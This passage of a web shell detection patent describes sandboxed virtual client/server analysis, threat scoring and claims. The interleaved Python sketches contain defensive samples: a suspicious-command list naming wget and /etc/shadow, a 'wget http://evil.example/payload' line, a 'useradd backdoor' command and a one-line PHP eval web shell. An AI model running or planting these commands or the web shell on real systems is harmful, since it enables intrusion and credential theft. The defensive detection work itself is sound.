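    """Combine the agent's inspection score with the virtualized analysis score."""
    return w_inspect * inspection_score + w_virtual * virtual_score

def remedial_actions(score, threshold=50):
    """Return remedial actions when the final score exceeds the threshold."""
    if score <= threshold:
        return []
    return ["issue_alert", "quarantine_object"]

score = final_threat_score(40, 80)   # 0.3*40 + 0.7*80
actions = remedial_actions(score)
```

In practice the threshold could be dynamic, varying with the object type or the software profile used to provision the virtualized analysis system, as noted above.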


In some embodiments, as shown, the cybersecurity agent 125 may be deployed within a network device that is not a server, including, but not limited to, a mainframe, a firewall, a data transfer device (e.g., router, switch, modem, bridge, etc.) or a client device. In other embodiments, the cybersecurity agent 125 may be operated on one of the plurality of servers.


Referring to FIG. 3, an exemplary block diagram of a cybersecurity system deployed as a cybersecurity appliance in accordance with an embodiment of the invention is shown. The cybersecurity appliance 300 may be similar in architecture to the cybersecurity appliances 130, 140 depicted in FIG. 1. The cybersecurity appliance 300 comprises one or more processors (e.g., CPU) 310, which is coupled to communication input/output interfaces 330 as well as to a persistent memory system 320. According to one embodiment of the disclosure, the input/output (I/O) interface 330 may be implemented as a physical interface including one or more ports for wired connectors. Alternatively, the entire cybersecurity appliance 300 may be implemented as software, such as a cybersecurity agent (e.g., cybersecurity agent 125 depicted in FIG. 2) and the input/output interface 330 may be implemented as a digital communication logic between the cybersecurity agent 125 and other software interfaces. Additionally, or in the alternative, the I/O interface 330 may be implemented with one or more radio units or other transmission mediums for supporting wireless communications with other electronic devices.


Within the persistent memory system 320 of the embodiment depicted in FIG. 3, various logics may be provided including, but not limited to, inspection logic 340, rule/threshold update logic 345, analyzer logic 350, correlation logic 360, and reporting logic 365.


In various embodiments, the inspection logic 340 can be utilized to facilitate a preliminary analysis of objects (e.g., object 170 as shown in FIG. 1) for cybersecurity threats. According to one embodiment of the disclosure, the inspection logic 340 retrieves the object 170 and the meta-information 175 associated with the object 170. During or after retrieval, the inspection logic 340 may analyze the characteristics of the object 170 and/or its meta-information 175 (e.g., specific data of the object 170 and/or meta-information 175; specific patterns or sequences of this data, structure, format or ordering deviations, object type, etc.) and determine whether these characteristics comply with one or more detection rules 342 that are updated based on historical cybersecurity threat information (from the cybersecurity appliance 130 and intelligence from other network devices or third-party systems) to determine whether the object 170 is "suspicious."


The rule/threshold update logic 345 is responsible for the updating of one or more rule sets and parameters 344, which includes the detection rules 342 and prescribed thresholds 343 used in determining suspiciousness or maliciousness of an object under analysis. The rule sets and parameters 344 may be utilized by the inspection logic 340, analyzer logic 350, correlation logic 360 and/or reporting logic 365, as these rules/parameters may be used to control the functionality of these logic components. The rule sets and/or parameters 344 may be changed or updated periodically or aperiodically in response to, for example, various new cybersecurity threats or current conditions of the cybersecurity system.


As an illustrative example, referring still to FIG. 3, the inspection logic 340 may inspect, in accordance with one or more detection rules 342, an extension associated with the object 170 to determine whether the extension is associated with a known script, such as a ".php" extension identifying that the object is a particular script, namely a PHP file. As PHP files are frequently used to conduct web shell attacks, the object type being a script would cause the inspection logic 340 to determine that the object 170 is "suspicious".
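A minimal sketch of this extension-based detection rule follows; the rule table is illustrative, and actual detection rules 342 would consider many more characteristics than the extension alone.

```python
# Extensions of scripting languages commonly used by web shell scripts
# (per the discussion above); an illustrative subset, not an exhaustive rule set.
SCRIPT_EXTENSIONS = {".php", ".py", ".rb", ".pl", ".asp", ".jsp", ".sh"}

def is_suspicious(filename):
    """Label an object suspicious when its extension maps to a known script type."""
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    return ext in SCRIPT_EXTENSIONS

is_suspicious("upload/shell.PHP")   # case-insensitive match on the extension
is_suspicious("report.pdf")         # non-script objects are not flagged by this rule
```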


In response to determining that the object 170 is suspicious, the inspection logic 340 may communicate with (e.g., generate a call to) the analyzer logic 350 to provision one or more virtualized analysis systems 355. In some embodiments the virtualized analysis systems 355 may be provisioned and instantiated by the analyzer logic 350 and/or in some embodiments the virtualized analysis systems 355 may be persistent. According to one embodiment of the disclosure, the analyzer logic 350 is configured to either (i) receive information pertaining to the data type of the object 170 (hereinafter, "object data type") or (ii) determine the object data type from the content of the object 170 and/or the meta-information 175. Based on the detected object data type, the analyzer logic 350 may be configured to select a software profile that supports the processing of the suspicious object 170 and provision the virtual server and the virtual client within at least one of the virtualized analysis systems 355 with that software profile. For instance, where the object 170 includes a script, the virtual server within the virtualized analysis system 355 may be provisioned to include one or more scripting engines that effectuate processing of the script. Similarly, the virtual client may be provisioned in accordance with a software profile (e.g., script applications, libraries, software development kits, etc.) needed to support communications with the virtual server, or even upload the object 170 into the virtual server.
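The selection of a software profile from the detected object data type might be sketched as below. The profile names and their contents are hypothetical placeholders for whatever engines and applications a real deployment would provision.

```python
# Hypothetical mapping from object data type to a software profile for
# provisioning the virtual server and virtual client.
PROFILES = {
    "php": {"server": ["web_server", "php_engine"],
            "client": ["browser", "http_library"]},
    "jsp": {"server": ["web_server", "jsp_engine"],
            "client": ["browser", "http_library"]},
}

def provision(object_data_type):
    """Select the profile matching the object data type and describe the
    virtual server/client provisioning derived from it."""
    profile = PROFILES.get(object_data_type)
    if profile is None:
        raise ValueError(f"no software profile for type {object_data_type!r}")
    return {"virtual_server": profile["server"],
            "virtual_client": profile["client"]}

env = provision("php")   # a PHP script gets a server with a PHP scripting engine
```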


Stated differently, the analyzer logic 350 can be utilized to generate the virtualized analysis system(s) 355, each including one or more analyzers to evaluate events produced during processing of the object. In certain embodiments, the analyzer logic 350 may examine the object content for an object data type and select a virtual client and virtual server for use in the analyzer logic 350. Furthermore, in some embodiments, the analyzer logic 350 may also examine the meta-information 175 obtained contemporaneously to possibly select a better-suited set of analyzers than would have been selected by using the content from the object 170 alone.


Also, the analyzer logic 350 may generate multiple virtualized analysis systems 355, where at least one virtual component (virtual server or virtual client) for each virtualized analysis system 355 may be provisioned using a different software profile (e.g., different OSes or different versions of the same OS among the virtualized analysis systems 355, different web browser applications or different versions of the same web browser application among the virtualized analysis systems 355, and/or different scripting engines or different versions of the same scripting engine among the virtualized analysis systems 355). As a result, different virtualized analysis systems may be selected to analyze the object within multiple virtual environments. In this way, the analyzer logic 350 may employ multiple types of analyzers to evaluate the suspicious object 170. Additionally, it is contemplated that the multiple virtualized analysis systems may be identically provisioned when different analytic procedures (e.g., different time accelerated analyses based on time (clock) manipulation, different object loading schemes, etc.) are employed. Additionally, these multiple analyzers may be operated in a synchronous or asynchronous manner.


In more embodiments, the persistent memory 320 may also comprise correlation logic 360. Correlation logic 360 examines the analytic results from the analyzers within the virtualized analysis systems 355 and generates threat assessment scores for the analytic results. According to one embodiment of the disclosure, the threat assessment scores may be generated by examining the differences between the various analyzers. By way of example and not limitation, the analytic results can be generated from a variety of analyzers that were instantiated to simulate a number of different configuration settings within the virtual server and client programs. In this way, the threat assessment score data may be formatted and adapted to reflect the various differences in the processing results across the plurality of analyzers.
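One way to sketch this correlation across differently provisioned analyzers is below. The event labels, weights, and the heuristic that environment-dependent behavior scores higher are illustrative assumptions, not the disclosed scoring method.

```python
def correlate(results):
    """results: mapping of analyzer name -> set of observed event labels.
    Events seen in only some configurations are weighted higher here, on the
    assumption that environment-sensitive behavior is more suspicious."""
    all_events = set().union(*results.values())
    n = len(results)
    score = 0
    for event in all_events:
        seen_in = sum(1 for events in results.values() if event in events)
        score += 10 if seen_in < n else 5   # divergent events score higher
    return score

# Two analyzers with different software profiles observed different events:
results = {"analyzer_a": {"priv_escalation", "outbound_conn"},
           "analyzer_b": {"outbound_conn"}}
score = correlate(results)
```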


In many embodiments, reporting logic 365 can be utilized to generate reports, emails, or other communications to an administrator informing her or him of the analytic results determined by the analyzer(s) within the one or more virtualized analysis systems deployed. In some embodiments, the reporting logic 365 may trigger a remedial action based on a predetermined rule set, which may include performing remediation activities including deleting or quarantining the object, blocking the object 170 from delivery to a targeted network device or storage, and/or reconfiguring settings within a possibly infested network device to remediate the effects of any web shell attacks until the infected network device can be examined. In still further embodiments, the reporting logic 365 may be updated such that the format or frequency of communications in response to certain detected cybersecurity threats may change and thus yield a different response, especially as different cybersecurity threats, such as different web shell attacks, are found to be more harmful or disruptive than others. In further embodiments, the reporting logic 365 may take remedial actions without human intervention.


III. Analyzer Systems

Referring now to FIG. 4, a first embodiment of a virtualized analysis system 400 is shown. The virtualized analysis system 400 features a single analyzer 420, which includes a virtual client 422 and virtual server 421. The analysis system 400 may be capable of generating a plurality of analyzers to evaluate and manipulate suspicious objects, where in some embodiments, the analyzers may be provisioned differently (e.g., different OS, application(s), scripting engine, etc.). Herein, the analyzer 420 may correspond to at least one virtual machine that attempts to open, process, or otherwise operate a suspicious object. In additional embodiments, the analyzer 420 provides a virtual (sandboxed) environment for processing of the suspicious object. In further additional embodiments, the analyzer 420 may generate a hash of the suspicious object for further comparison/analysis to avoid duplicative analysis of identical objects.
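The hash-based avoidance of duplicative analysis mentioned above can be sketched using SHA-256 over the object's bytes; the cache structure and the callback interface are assumptions for illustration.

```python
import hashlib

_analyzed = {}   # hash of object content -> previously computed verdict

def analyze_once(object_bytes, analyze):
    """Run `analyze` on the object unless an identical object was already
    evaluated, in which case return the cached verdict."""
    digest = hashlib.sha256(object_bytes).hexdigest()
    if digest in _analyzed:
        return _analyzed[digest]          # skip duplicative analysis
    verdict = analyze(object_bytes)
    _analyzed[digest] = verdict
    return verdict

# A stand-in analyzer that records how many times it actually ran:
calls = []
def fake_analyzer(data):
    calls.append(data)
    return "suspicious"

analyze_once(b"<?php eval($_POST['c']); ?>", fake_analyzer)
analyze_once(b"<?php eval($_POST['c']); ?>", fake_analyzer)  # cache hit; analyzer not re-run
```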


As further shown in FIG. 4, the analysis system 400 may generate a single analyzer 420 which is provisioned with the virtual server 421 and the virtual client 422. The virtual server 421 and virtual client 422 may be configured with a virtual communication link (or virtual connection) 425 between the virtual server 421 and the virtual client 422. Events based on operations conducted by the virtual server 421, operations conducted by the virtual client 422, and/or communications over the virtual communication link 425 between the virtual server 421 and virtual client 422 may be monitored by the monitoring logic 440. Commands may be deemed suspicious when these commands are unexpectedly encountered in communications exchanged between the virtual server 421 and virtual client 422 during processing of a suspicious object. For example, suspicious commands may include, at least in part, those commands directed to unusual activities that influence operability or promote illicit exfiltration, such as adjusting access privileges, downloading data maintained in storage locations designated for sensitive data, or specific commands associated with a known web shell attack.
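A hypothetical sketch of this monitoring logic follows: flag commands on the virtual communication link that match a suspicious-command rule set, while ignoring commands that the orchestrated transmission scheme is known to produce. The command strings and prefix matching are illustrative.

```python
# Illustrative prefixes of commands directed to unusual activities
# (privilege changes, exfiltration, payload retrieval).
SUSPICIOUS_PREFIXES = ("chmod 777", "useradd", "wget", "cat /etc/shadow")

def monitor(commands, orchestrated):
    """Return commands that look suspicious and were not expected as part of
    the orchestrated message transmission scheme."""
    flagged = []
    for cmd in commands:
        if cmd in orchestrated:
            continue                       # expected per the detection rules
        if cmd.startswith(SUSPICIOUS_PREFIXES):
            flagged.append(cmd)
    return flagged

observed = ["GET /index.php",
            "wget http://evil.example/payload",
            "useradd backdoor"]
flagged = monitor(observed, orchestrated={"GET /index.php"})
```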


However, it is noted that the virtual client 422 may be configured to follow an orchestrated message transmission scheme that prompts transmission of suspicious commands. Also, the virtual client 422 may attempt to simulate a compromised client device within the appliance or customer network that is, by way of illustrative example, attempting to facilitate a cybersecurity attack on another device, including utilizing a web shell attack. Given knowledge of the orchestrated message transmission schemes, which may be part of the detection rules 342, the resultant commands from the virtual client 422 are expected and would not be viewed as suspicious commands in the analytics.


In certain cases, a cybersecurity attack such as a web shell attack may be triggered by a subsequent command being sent from the virtual client 422 to the virtual server 421. In these instances, monitoring the virtual communication link 425 by the monitoring logic 440 for commands indicative of web shell attacks may yield insights into the potential threat of a suspicious object. Typically, the suspicious object comprising web shell script can be loaded on the virtual server 421, either directly or from the virtual client 422. Herein, the virtualized analysis system 400 may comprise a detonator logic 430 which can aid in the evaluation of a suspicious object. For example, a web shell attack on a server may be triggered by an activity undertaken at the virtual client 422 such as user interface activity by the user or a web page being launched at the virtual client 422. As a result, the detonator logic 430 may be utilized to provide methods of triggering the suspicious object to determine if it is part of a web shell attack. By way of example and not limitation, the detonator logic 430 may direct the virtual client 422 to send a specific command to the virtual server 421. These commands may simulate interaction with user input devices such as a keyboard, mouse or touchpad or may be directed to commands that are utilized in known web shell attacks. As can be understood by those skilled in the art, the detonator logic 430 can provide a variety of methods to attempt to trigger a web shell attack.
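The detonator's role of driving trigger commands from the virtual client to the virtual server might be sketched as below. The command list, the web-shell-style request, and the stand-in virtual server are hypothetical and only illustrate the interface, not any actual detonation rule set.

```python
# Illustrative trigger commands: a web-shell-style request plus simulated
# user input events, per the discussion above.
TRIGGER_COMMANDS = ["GET /shell.php?cmd=id",   # command-execution style request
                    "click:submit_button",      # simulated UI interaction
                    "keypress:ENTER"]

def detonate(send_to_server, commands=TRIGGER_COMMANDS):
    """Send each trigger command from the virtual client and collect the
    virtual server's responses for later analytics."""
    return [send_to_server(cmd) for cmd in commands]

# A stand-in virtual server that "responds" only to the web-shell request:
def fake_virtual_server(cmd):
    return "uid=0(root)" if "cmd=id" in cmd else "ok"

responses = detonate(fake_virtual_server)
```

A response revealing command execution (here, `id` output) would be the kind of event the monitoring logic flags as indicative of a web shell attack.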


It is contemplated that the analysis system 400 may be utilized in various embodiments including in a cybersecurity appliance or a cybersecurity agent. The cybersecurity appliance can be similar to the cybersecurity appliance 300 of FIG. 3 wherein the analyzer logic 350 generates an analysis system 400 utilizing a single analyzer 420 comprising a virtual server 421, virtual client 422, and a monitored virtual communication link 425 between them. In some embodiments, the analyzer comprises a single virtual machine configured to support operability of the virtual server 421, virtual client 422 and the virtual communication link 425. Similarly, the cybersecurity agent can be similar to the cybersecurity agent 125 of FIG. 2 in which the analysis system 225 operates as a virtual environment, which may include the single analyzer 420 including both the virtual client 422 and virtual server 421.


Referring to FIG. 5, a second embodiment of a virtualized analysis system 500 is shown. Unlike the single analyzer deployment in FIG. 4, the virtualized analysis system 500 includes a first analyzer 510 that features a virtual server 511 and a second analyzer 520 that features a virtual client 512. In contrast to the embodiments described in FIG. 4, many embodiments may exist where the virtual server 511 and virtual client 512 are generated on separate analyzers 510, 520. In these embodiments, a virtual communication link 540 may still be instantiated to simulate a physical communication link between a server and a client device. Likewise, a detonator logic 530 can be employed to attempt to trigger activation of a potential web shell script within a suspicious object loaded into either the first analyzer 510 or the second analyzer 520.


It is contemplated that many aspects related to the virtual resources within the virtual analysis system 400 of FIG. 4 are applicable to the virtualized analysis system 500 of FIG. 5. In other words, the virtual server 511, the virtual client 512, the detonator logic 530 and the monitoring logic 540 operate in a similar manner as described in FIG. 4. Similarly, it is also contemplated that various embodiments of the analysis system 500 may be incorporated into one or more cybersecurity appliances and/or cybersecurity agents. Further, the analysis system 500 may be generated by the analyzer logic 350 found within a cybersecurity appliance such as the cybersecurity appliance as taught in FIG. 3. Finally, it would be understood by those skilled in the art that the virtual communication link 540 may be accomplished in a number of ways, including, but not limited to, a standard object configured to pass calls to both the virtual server 511 and the virtual client 512.


Although not shown, the cybersecurity system may be provided as a cloud service where the virtual analysis system may be a collection of virtual resources (e.g., one or more virtual compute engines, one or more virtual data stores, etc.) that are not instantiated anew for each object submitted for analysis. Instead, the virtual analysis systems may be persistent (e.g., long lived and in "hot standby"), awaiting detonation, in which communications between some of these virtual resources are conducted to provide a virtual server and a virtual client matching the profile needed to detonate the suspicious object. The rules associated with the detonation technique (e.g., orchestrated communications, etc.) may be maintained within one of the virtual data stores.


IV. Server Attack Detection Process

Referring now to FIG. 6, an exemplary embodiment of a flowchart illustrating a process of detecting cyberattacks on servers utilizing an analyzer that features both a virtual client and a virtual server is shown. In many embodiments, the process 600 begins by inspecting various objects received by a cybersecurity system (block 610). In certain embodiments, the cybersecurity system may be implemented as a cybersecurity appliance or as a cybersecurity agent. Herein, the inspection may be conducted as a rule-based inspection where compliance or non-compliance with certain rules may be used to determine whether the received object is suspicious. These detection rules may be adjusted based on the cybersecurity threat landscape. By way of example and not limitation, one of the detection rules may provide that, upon detection of an object under analysis including a script file (e.g., a PHP, ASP, or JSP file), the object is labeled "suspicious" and is subsequently loaded into the virtualized analysis system for analysis.


Once an object is deemed "suspicious", the suspicious object may be tagged for subsequent loading into a virtualized analysis system provisioned for processing suspicious objects (block 615). Additionally, a virtualized analysis system is created and provisioned to process the suspicious object for further evaluation (blocks 620 and 630). In particular, the virtualized analysis system is provisioned to include a software representation of a server (virtual server), a software representation of a client device (virtual client), and a software representation of a communication link between the virtual server and the virtual client (virtual communication link). The virtualized analysis system may be further provisioned with detonator logic, which is configured to initiate processing of the suspicious object, when loaded into the virtual server, and to orchestrate communications between the virtual client and the virtual server (e.g., coordinates transmission of commands from the virtual client, coordinates responding to the commands, etc.) that may prompt the suspicious object to perform unexpected, abnormal or inconsistent events indicative of a cybersecurity threat such as a web shell attack.


When the virtual server and virtual client are instantiated as part of the virtualized analysis system, the suspicious object is loaded into the virtual server (block 640). After the suspicious object is loaded into the virtual server, the detonator logic commences and controls a prescribed interaction (i.e., communications) between the virtual server and the virtual client in attempts to trigger the suspicious object (block 650). These communications may be an orchestrated exchange or sequence of messages (e.g., commands, data or control information, etc.). During these communications, monitoring logic is configured to monitor and log information propagating over the virtual communication link between the virtual server and the virtual client. The information may include commands or other activity indicative of a web shell attack (block 660).


Thereafter, analytics are performed on the monitored and logged information to determine whether the logged information includes events that are indicative of a web shell attack. In certain embodiments, the monitored communication and results observed can be correlated to generate a threat assessment score indicative of a threat level (block 670). In response to the threat assessment score being generated, the process 600 evaluates the threat assessment score to determine if it is above a particular threshold, where the threshold may be static based on the type of suspicious activity being analyzed or dynamic based on recent cybersecurity threat activity (block 680). When the threat assessment score is not above the threshold, the process 600 can end (block 695). When a threat assessment score exceeds a given threshold, at least one responsive action may be taken by the cybersecurity system such as a cybersecurity appliance or a cybersecurity agent (block 690). In some cases, the responsive action is a remedial action to counter the potential threat which may include, but is not limited to, deleting the threatening data, quarantining the threatening data, or generating a report to an administrator regarding the nature of the threat for further action.
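The scoring stage of process 600 (blocks 670-690) can be sketched compactly: logged events are correlated into a threat assessment score, which is compared against a threshold to select a responsive action. The event labels, per-event weights, threshold, and action name are illustrative assumptions.

```python
# Illustrative weights for events of the kind described above
# (privilege requests, downloads, secure-memory reads).
EVENT_WEIGHTS = {"privilege_request": 20,
                 "outbound_download": 30,
                 "secure_memory_read": 35}

def assess(logged_events, threshold=50):
    """Correlate logged events into a threat assessment score (block 670) and,
    when the score exceeds the threshold (block 680), return a responsive
    action (block 690); otherwise no action (block 695)."""
    score = sum(EVENT_WEIGHTS.get(event, 5) for event in logged_events)
    if score > threshold:
        return score, "quarantine"
    return score, None

score, action = assess(["privilege_request",
                        "outbound_download",
                        "secure_memory_read"])
```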


In the foregoing description, the invention is described with reference to specific embodiments thereof. It will, however, be evident that various modifications and changes may be made thereto without departing from the broader spirit and scope of the invention as set forth in the appended claims.

Claims
  • 1. An electronic device for detecting threats within a server, comprising: a processor; and a non-transitory storage medium communicatively coupled to the processor, the non-transitory storage medium including logic executed by the processor, the logic comprises an inspection logic to receive a suspicious object for threat evaluation, an analyzer logic to generate an analysis system comprising a first analyzer including a virtual client and a second analyzer including a virtual server, wherein a virtual communication link is established between the virtual client of the first analyzer and the virtual server of the second analyzer, wherein the received suspicious object is loaded into the virtual client of the first analyzer, and a detonator logic to trigger the suspicious object within the virtual client, wherein the analysis system monitors at least data transferred on the virtual communication link and generates a first threat score based upon the monitored data transferred over the virtual communication link.
  • 2. The electronic device of claim 1, wherein the non-transitory storage medium further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on an analysis of the suspicious object; and a correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and the second threat score to generate an overall threat score.
  • 3. The electronic device of claim 2, wherein the non-transitory storage medium further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 4. The electronic device of claim 1, wherein the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 5. The electronic device of claim 1, wherein the monitored data is scored based on commands sent from the virtual client of the first analyzer to the virtual server of the second analyzer indicative of a web shell attack.
  • 6. The electronic device of claim 1, wherein the triggering of the suspicious object comprises inputting user commands on the virtual client indicative of cybersecurity attacks.
  • 7. A cybersecurity software agent stored within a non-transitory storage medium and configured, upon execution, to detect threats within a server, the cybersecurity software agent comprising: an inspection logic stored within the non-transitory storage medium, the inspection logic, when executed, is configured to receive a suspicious object for threat evaluation; an analyzer logic stored within the non-transitory storage medium, the analyzer logic, when executed, is configured to generate an analysis system comprising a first analyzer with a virtual client and a second analyzer with a virtual server, wherein a virtual communication link is established between the virtual client of the first analyzer and the virtual server of the second analyzer, wherein the received suspicious object is loaded into the virtual client; and a detonator logic stored within the non-transitory storage medium, the detonator logic, when executed, is configured to trigger the suspicious object, wherein the analysis system is further configured to monitor data transferred on the virtual communication link and generate a first threat score based upon the monitored data transferred over the virtual communication link.
  • 8. The cybersecurity software agent of claim 7, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on the analysis of the suspicious object; and a correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and second threat score to generate an overall threat score.
  • 9. The cybersecurity software agent of claim 8, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 10. The cybersecurity software agent of claim 7, wherein the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 11. The cybersecurity software agent of claim 7, wherein the monitored data is scored based on commands sent from the virtual client of the first analyzer to the virtual server of the second analyzer indicative of a web shell attack.
  • 12. The cybersecurity software agent of claim 7, wherein the triggering of the suspicious object comprises inputting user commands on the virtual client indicative of cybersecurity attacks.
  • 13. A cybersecurity software agent stored within a non-transitory storage medium and configured, upon execution, to detect threats within a server, the cybersecurity software agent comprising: an analysis system stored within the non-transitory storage medium, the analysis system comprising one or more analyzers including a virtual client and a virtual server, wherein a virtual communication link is established between the virtual client and the virtual server, wherein a suspicious object under analysis is loaded into the virtual client; and a detonator logic stored within the non-transitory storage medium, the detonator logic is configured to trigger the suspicious object, wherein the analysis system is further configured to monitor data transferred on the virtual communication link and generate a first threat score based upon the monitored data transferred over the virtual communication link.
  • 14. The cybersecurity software agent of claim 13, wherein the analysis system monitors events associated with operations of the virtual server or the virtual client or both the virtual server and the virtual client.
  • 15. The cybersecurity software agent of claim 13, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a static analysis logic to analyze the suspicious object and generate a second threat score based on the analysis of the suspicious object; and a correlation logic to receive the first threat score, the second threat score, and correlate the first threat score and second threat score to generate an overall threat score.
  • 16. The cybersecurity software agent of claim 15, wherein the non-transitory storage medium configured to store the cybersecurity software agent further comprises: a reporting logic that compares the overall threat score to at least one threshold and in response to the overall threat score exceeding the at least one threshold, generating at least one remedial action.
  • 17. The cybersecurity software agent of claim 13, wherein the analysis system comprises a first analyzer with the virtual client and a second analyzer with the virtual server, the analysis system further monitors a first end state of the virtual client of the first analyzer and a second end state of the virtual server of the second analyzer and generates a first threat score based upon the monitored data, the first end state, and the second end state.
  • 18. The electronic device of claim 1, wherein the analysis system monitors events associated with operations of the virtual server or the virtual client or both the virtual server and the virtual client.
CROSS REFERENCE TO RELATED APPLICATIONS

This application is based upon and claims the benefit of priority from U.S. Provisional Patent Application No. 62/826,875 filed Mar. 29, 2019, the entire contents of which are incorporated herein by reference.

US Referenced Citations (483)
Number Name Date Kind
6898632 Gordy et al. May 2005 B2
6941348 Petry et al. Sep 2005 B2
7080407 Zhao et al. Jul 2006 B1
7080408 Pak et al. Jul 2006 B1
7243371 Kasper et al. Jul 2007 B1
7308716 Danford et al. Dec 2007 B2
7448084 Apap et al. Nov 2008 B1
7458098 Judge et al. Nov 2008 B2
7467408 O'Toole, Jr. Dec 2008 B1
7496961 Zimmer et al. Feb 2009 B2
7519990 Xie Apr 2009 B1
7540025 Tzadikario May 2009 B2
7639714 Stolfo et al. Dec 2009 B2
7698548 Shelest et al. Apr 2010 B2
7779463 Stolfo et al. Aug 2010 B2
7854007 Sprosts et al. Dec 2010 B2
7937387 Frazier et al. May 2011 B2
7949849 Lowe et al. May 2011 B2
8006305 Aziz Aug 2011 B2
8020206 Hubbard et al. Sep 2011 B2
8045458 Alperovitch et al. Oct 2011 B2
8069484 McMillan et al. Nov 2011 B2
8171553 Aziz et al. May 2012 B2
8201246 Wu et al. Jun 2012 B1
8204984 Aziz et al. Jun 2012 B1
8214905 Doukhvalov et al. Jul 2012 B1
8291499 Aziz et al. Oct 2012 B2
8370938 Daswani et al. Feb 2013 B1
8370939 Zaitsev et al. Feb 2013 B2
8375444 Aziz et al. Feb 2013 B2
8438644 Watters et al. May 2013 B2
8464340 Ahn et al. Jun 2013 B2
8494974 Watters et al. Jul 2013 B2
8516593 Aziz Aug 2013 B2
8528086 Aziz Sep 2013 B1
8539582 Aziz et al. Sep 2013 B1
8549638 Aziz Oct 2013 B2
8561177 Aziz et al. Oct 2013 B1
8566476 Shiffer et al. Oct 2013 B2
8566946 Aziz et al. Oct 2013 B1
8584239 Aziz et al. Nov 2013 B2
8635696 Aziz Jan 2014 B1
8689333 Aziz Apr 2014 B2
8713681 Silberman et al. Apr 2014 B2
8776229 Aziz Jul 2014 B1
8793278 Frazier et al. Jul 2014 B2
8793787 Ismael et al. Jul 2014 B2
8813050 Watters et al. Aug 2014 B2
8832829 Manni et al. Sep 2014 B2
8850571 Staniford et al. Sep 2014 B2
8881271 Butler, II Nov 2014 B2
8881282 Aziz et al. Nov 2014 B1
8898788 Aziz et al. Nov 2014 B1
8935779 Manni et al. Jan 2015 B2
8949257 Shiffer et al. Feb 2015 B2
8984638 Aziz et al. Mar 2015 B1
8990939 Staniford et al. Mar 2015 B2
8990944 Singh et al. Mar 2015 B1
8997219 Staniford et al. Mar 2015 B2
9009822 Ismael et al. Apr 2015 B1
9009823 Ismael et al. Apr 2015 B1
9015846 Watters et al. Apr 2015 B2
9027135 Aziz May 2015 B1
9071638 Aziz et al. Jun 2015 B1
9104867 Thioux et al. Aug 2015 B1
9106630 Frazier et al. Aug 2015 B2
9106694 Aziz et al. Aug 2015 B2
9118715 Staniford et al. Aug 2015 B2
9159035 Ismael et al. Oct 2015 B1
9171160 Vincent et al. Oct 2015 B2
9176843 Ismael et al. Nov 2015 B1
9189627 Islam Nov 2015 B1
9195829 Goradia et al. Nov 2015 B1
9197664 Aziz et al. Nov 2015 B1
9223972 Vincent et al. Dec 2015 B1
9225740 Ismael et al. Dec 2015 B1
9241010 Bennett et al. Jan 2016 B1
9251343 Vincent et al. Feb 2016 B1
9262635 Paithane et al. Feb 2016 B2
9268936 Butler Feb 2016 B2
9275229 LeMasters Mar 2016 B2
9282109 Aziz et al. Mar 2016 B1
9292686 Ismael et al. Mar 2016 B2
9294501 Mesdaq et al. Mar 2016 B2
9300686 Pidathala et al. Mar 2016 B2
9306960 Aziz Apr 2016 B1
9306974 Aziz et al. Apr 2016 B1
9311479 Manni et al. Apr 2016 B1
9355247 Thioux et al. May 2016 B1
9356944 Aziz May 2016 B1
9363280 Rivlin et al. Jun 2016 B1
9367681 Ismael et al. Jun 2016 B1
9398028 Karandikar et al. Jul 2016 B1
9413781 Cunningham et al. Aug 2016 B2
9426071 Caldejon et al. Aug 2016 B1
9430646 Mushtaq et al. Aug 2016 B1
9432389 Khalid et al. Aug 2016 B1
9438613 Paithane et al. Sep 2016 B1
9438622 Staniford et al. Sep 2016 B1
9438623 Thioux et al. Sep 2016 B1
9459901 Jung et al. Oct 2016 B2
9467460 Otvagin et al. Oct 2016 B1
9483644 Paithane et al. Nov 2016 B1
9495180 Ismael Nov 2016 B2
9497213 Thompson et al. Nov 2016 B2
9507935 Ismael et al. Nov 2016 B2
9516057 Aziz Dec 2016 B2
9519782 Aziz et al. Dec 2016 B2
9536091 Paithane et al. Jan 2017 B2
9537972 Edwards et al. Jan 2017 B1
9560059 Islam Jan 2017 B1
9565202 Kindlund et al. Feb 2017 B1
9591015 Amin et al. Mar 2017 B1
9591020 Aziz Mar 2017 B1
9594904 Jain et al. Mar 2017 B1
9594905 Ismael et al. Mar 2017 B1
9594912 Thioux et al. Mar 2017 B1
9609007 Rivlin et al. Mar 2017 B1
9626509 Khalid et al. Apr 2017 B1
9628498 Aziz et al. Apr 2017 B1
9628507 Haq et al. Apr 2017 B2
9633134 Ross Apr 2017 B2
9635039 Islam et al. Apr 2017 B1
9641546 Manni et al. May 2017 B1
9654485 Neumann May 2017 B1
9661009 Karandikar et al. May 2017 B1
9661018 Aziz May 2017 B1
9674298 Edwards et al. Jun 2017 B1
9680862 Ismael et al. Jun 2017 B2
9690606 Ha et al. Jun 2017 B1
9690933 Singh et al. Jun 2017 B1
9690935 Shiffer et al. Jun 2017 B2
9690936 Malik et al. Jun 2017 B1
9736179 Ismael Aug 2017 B2
9740857 Ismael et al. Aug 2017 B2
9747446 Pidathala et al. Aug 2017 B1
9749343 Watters et al. Aug 2017 B2
9749344 Watters et al. Aug 2017 B2
9756074 Aziz Sep 2017 B2
9773112 Rathor et al. Sep 2017 B1
9781144 Otvagin et al. Oct 2017 B1
9787700 Amin et al. Oct 2017 B1
9787706 Otvagin et al. Oct 2017 B1
9792196 Ismael et al. Oct 2017 B1
9824209 Ismael et al. Nov 2017 B1
9824211 Wilson Nov 2017 B2
9824216 Khalid et al. Nov 2017 B1
9825976 Gomez et al. Nov 2017 B1
9825989 Mehra et al. Nov 2017 B1
9838408 Karandikar et al. Dec 2017 B1
